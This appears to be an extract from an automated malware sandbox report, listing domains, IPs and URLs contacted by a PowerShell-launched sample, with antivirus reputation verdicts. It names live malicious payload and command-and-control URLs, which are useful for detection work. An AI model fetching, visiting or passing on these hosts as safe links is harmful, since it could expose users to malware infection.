                  http://www.inastra.online/gbk4/?Jr=tnaxxtx&ZrE=Xcz/lKtmYzaclw33ohiXS7QV/Se8Pq+n4C+TPx5KwIQWTY7xXXdhlW/5Nf4u3/jcsrURWrDv59TKoDO7PIpn/ZUTTTwXyUNiXs6DylNi2YpMPJOOA+G6DJ3d/zRep1m17eaWMwM=100%Avira URL Cloudmalware
                  http://172.245.123.3/784/verygreattrafficwithniceworkingskilltobegood.tIFM0%Avira URL Cloudsafe
                  http://www.aaavvejibej.bond/j82t/0%Avira URL Cloudsafe
                  http://www.tophcom.online/vfa8/0%Avira URL Cloudsafe
                  http://www.inastra.online/Toyota_F1.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXNi6iOlK82%2Fl100%Avira URL Cloudmalware
                  http://www.ortenckt.online/aj1a/?ZrE=Ur0ZWyFT8OiEfJLk5CDxNCd7dngJ/nUOC6gmTkbLwRlGrqwEpeuL3mntSz3wGsXywBh/uITd5DD6tXUqWwiKdOlO+GKC/0z5L+tJCqOb0hSd3y/0vLqXRKaQtaaTWzJkNrBKAAI=&Jr=tnaxxtx0%Avira URL Cloudsafe
                  http://www.inastra.online/Opel_Astra.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXNi6iOlK82%2F100%Avira URL Cloudmalware
                  http://172.245.123.3/784/verygreattrafficwithniceworkingskilltobegood.tIFa0%Avira URL Cloudsafe
                  http://172.245.123.3/784/verygre0%Avira URL Cloudsafe
                  https://libs.jshub.com/font-awesome/5.10.0-12/css/solid.min.css0%Avira URL Cloudsafe
                  http://www.qmmkl.buzz/e3vj/0%Avira URL Cloudsafe
                  http://www.inastra.online/__media__/js/trademark.php?d=inastra.online&type=ns100%Avira URL Cloudmalware
                  http://www.aaavvejibej.bond/j82t/?ZrE=NfWXDnAQh5K3pnOvM14VTy+amnJPckA/Yfv/BKk9TV5fOF3SI/PjO3S5UMxnHoxUaRbUJGZsTsQcLMza5Yog8fRAodWufvWEXO0cDD2ch1ehULAsaf2d9mbkKApg9S+Ve9CxlSo=&Jr=tnaxxtx0%Avira URL Cloudsafe
                  http://www.asiapartnars.online/tkmh/0%Avira URL Cloudsafe
                  http://www.inastra.online/2019_Toyota_Land_Cruiser.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEX100%Avira URL Cloudmalware
                  http://www.ks1x7i.vip/dlcs/0%Avira URL Cloudsafe
                  http://www.inastra.online/__media__/design/underconstructionnotice.php?d=inastra.online100%Avira URL Cloudmalware
                  http://microsoft.coX0%Avira URL Cloudsafe
                  http://www.qmmkl.buzz0%Avira URL Cloudsafe
                  http://www.microsoft.cjz0%Avira URL Cloudsafe
                  https://libs.jshub.com/font-awesome/5.10.0-12/css/fontawesome.min.css0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  www.qmmkl.buzz
                  199.115.230.222
                  truetrue
                    unknown
                    www.inastra.online
                    208.91.197.27
                    truetrueunknown
                    www.tophcom.online
                    162.213.249.216
                    truetrueunknown
                    wmnfkj.a.1112dns.com
                    154.82.100.177
                    truetrue
                      unknown
                      www.aaavvejibej.bond
                      104.21.31.249
                      truetrue
                        unknown
                        chalet-tofane.net
                        62.149.128.40
                        truetrue
                          unknown
                          deikamalaharris.info
                          3.33.130.190
                          truetrue
                            unknown
                            asiapartnars.online
                            3.33.130.190
                            truetrue
                              unknown
                              ortenckt.online
                              3.33.130.190
                              truetrue
                                unknown
                                healthyloveforall.net
                                3.33.130.190
                                truetrue
                                  unknown
                                  ks1x7i.vip
                                  3.33.130.190
                                  truetrue
                                    unknown
                                    res.cloudinary.com
                                    unknown
                                    unknownfalse
                                      high
                                      www.healthyloveforall.net
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.asiapartnars.online
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.yu12345.xyz
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.ortenckt.online
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.ks1x7i.vip
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.deikamalaharris.info
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  www.chalet-tofane.net
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.deikamalaharris.info/lrgf/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.healthyloveforall.net/566f/?ZrE=81geMJs5jQmVeK4hwDBPKHBGvn0Tm7ZwgeOmc9jTU6Fy38DzzGnJ98DUeY7D2pyu2XwXZT+7XMaW7aMNMrEzQeD/F7FTjsbI9QNHnkd6Arn6dVLur5eWw9nVs6w/1EYvnvYCbSs=&Jr=tnaxxtxtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.yu12345.xyz/mnl8/true
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.qmmkl.buzz/e3vj/?Jr=tnaxxtx&ZrE=Apw/qEhkM9PBzv16DC8g1MSIQhvVD2Vj01FPVXV4CfqJVQ1J3uaJteAUq9BD3RYf6FzZ09NLBogJcHSO0hmFge+YoOQSOFa9DG3d+S6Zcyz3+NwsM7PgNDQLFA8HvIbfdwoJPYw=true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://172.245.123.3/784/CAMRRAM.txttrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.chalet-tofane.net/obbp/true
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.healthyloveforall.net/566f/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.ks1x7i.vip/dlcs/?ZrE=w6QiAdP8awPLsa7eBVc39wzje3KOivPaseEO6V4cXiHKOPXUCZsKQLVdGPqPnVEzm93wkYEJdOAjyg/exCmJYaQq4xVLxeGT88y8VuPgcLQNhWCgEoW6IBmijKvaz1FJHcFNtNE=&Jr=tnaxxtxtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.deikamalaharris.info/lrgf/?ZrE=hLl6Iyyv1/RGmZWnRJ8bmiMJmTP6dhK4gm2wi1fTCYCBRK5IakRwGOHrv3dZYUH5yIXieuiAG/czDQPLmWqEbLilSzY96+fF8eVAog2wOE9edOY1dT6GtuOhq9bHDkAhjeaZiB4=&Jr=tnaxxtxtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.chalet-tofane.net/obbp/?ZrE=q8u4kFvwJtfA9Pl2Tc7XzAnO7IWA4JmOGaMFAF6owipiqs4LNofKQ6whCXFZjhm4RzxlyIFmCbk02gBov1+7TAel+jFtI3CD3Jdw5DP3HME6qP+mS3NVD/GMMnbyFe0QVN3VaJo=&Jr=tnaxxtxtrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://172.245.123.3/784/verygreattrafficwithniceworkingskilltobegood.tIFtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.yu12345.xyz/mnl8/?ZrE=RGOQJd/YEggQptEich3q6d0bfn/irFBnx+ZpwzxB5TUNCs3vZOAWTRyo0cim1/zDkhtz3OYESkByNsQcxwF9aubDKJHPAYECM7rOvY9yH/ydWUGi/0eSoW1GLP2ssLvhhZDeTZQ=&Jr=tnaxxtxtrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.tophcom.online/vfa8/?ZrE=yTDEjSVS0lCRYcLIcrIR3TcCYEVKOYUzZB0jcnDiZYtjnJOoqq5Z+2u71ELG2uGtiKDGExTS3yLoYSdFQgyUiMInkJIsAAFuKMZReKrfZcHWOCruByZu1/Jk+op4CslnIJH3FWE=&Jr=tnaxxtxtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.ortenckt.online/aj1a/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.inastra.online/gbk4/?Jr=tnaxxtx&ZrE=Xcz/lKtmYzaclw33ohiXS7QV/Se8Pq+n4C+TPx5KwIQWTY7xXXdhlW/5Nf4u3/jcsrURWrDv59TKoDO7PIpn/ZUTTTwXyUNiXs6DylNi2YpMPJOOA+G6DJ3d/zRep1m17eaWMwM=true
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.tophcom.online/vfa8/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.aaavvejibej.bond/j82t/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.ortenckt.online/aj1a/?ZrE=Ur0ZWyFT8OiEfJLk5CDxNCd7dngJ/nUOC6gmTkbLwRlGrqwEpeuL3mntSz3wGsXywBh/uITd5DD6tXUqWwiKdOlO+GKC/0z5L+tJCqOb0hSd3y/0vLqXRKaQtaaTWzJkNrBKAAI=&Jr=tnaxxtxtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.qmmkl.buzz/e3vj/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.aaavvejibej.bond/j82t/?ZrE=NfWXDnAQh5K3pnOvM14VTy+amnJPckA/Yfv/BKk9TV5fOF3SI/PjO3S5UMxnHoxUaRbUJGZsTsQcLMza5Yog8fRAodWufvWEXO0cDD2ch1ehULAsaf2d9mbkKApg9S+Ve9CxlSo=&Jr=tnaxxtxtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.ks1x7i.vip/dlcs/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.asiapartnars.online/tkmh/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://duckduckgo.com/chrome_newtabieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixlSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                        high
                                                        https://dts.gnpge.comfirefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                          high
                                                          https://duckduckgo.com/ac/?q=ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://i1.cdn-image.com/__media__/pics/29590/bg1.png)lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                              high
                                                              http://crl.microsoftpowershell.exe, 00000003.00000002.2201321954.0000000007A57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://cdn.consentmanager.netlSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                high
                                                                http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                  high
                                                                  https://contoso.com/Licensepowershell.exe, 00000008.00000002.2440544161.0000000005BC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.inastra.online/Toyota_Avensis.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXNi6iOlK8lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.Inastra.onlinelSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      http://www.inastra.online/Vintage_Car_Auctions.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXNilSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularlSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                        high
                                                                        http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpglSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.chalet-tofane.net:80/obbp/?ZrE=q8u4kFvwJtfA9Pl2Tc7XzAnO7IWA4JmOGaMFAF6owipiqs4LNofKQ6whCXlSomfUdjbC.exe, 0000000C.00000002.4514859333.00000000054F0000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.0000000005B50000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotlSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                            high
                                                                            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otflSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                              high
                                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixlSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                high
                                                                                https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.2198089199.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2440544161.0000000004B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://contoso.com/powershell.exe, 00000008.00000002.2440544161.0000000005BC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2199749880.0000000006336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2440544161.0000000005BC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otflSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.ngxfence.comlSomfUdjbC.exe, 0000000C.00000002.4514859333.00000000059A6000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.0000000006006000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://i1.cdn-image.com/__media__/pics/28903/search.png)lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldlSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2198089199.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2440544161.0000000004B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.inastra.online/display.cfmlSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  unknown
                                                                                                  https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgpowershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2473607198.00000000076AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://delivery.consentmanager.netlSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2199749880.0000000006336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2440544161.0000000005BC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.2198089199.0000000005427000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpglSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.2198089199.0000000005427000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotlSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://172.245.123.3/784/verygreattrafficwithniceworkingskilltobegood.tIFMpowershell.exe, 00000003.00000002.2196881592.000000000322D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://contoso.com/Iconpowershell.exe, 00000008.00000002.2440544161.0000000005BC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.inastra.online/Toyota_F1.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXNi6iOlK82%2FllSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      unknown
                                                                                                                      http://www.inastra.online/Opel_Astra.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXNi6iOlK82%2FlSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      unknown
                                                                                                                      https://www.ecosia.org/newtab/ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://172.245.123.3/784/verygreattrafficwithniceworkingskilltobegood.tIFapowershell.exe, 00000003.00000002.2196881592.000000000322D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://ac.ecosia.org/autocomplete?q=ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.wofflSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://libs.jshub.com/font-awesome/5.10.0-12/css/solid.min.csslSomfUdjbC.exe, 0000000C.00000002.4514859333.00000000059A6000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.0000000006006000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://172.245.123.3/784/verygrepowershell.exe, 00000003.00000002.2198089199.0000000005692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://res.cloudinary.compowershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgtpowershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://crl.micropowershell.exe, 00000003.00000002.2201238458.00000000079BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2439851510.000000000324C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
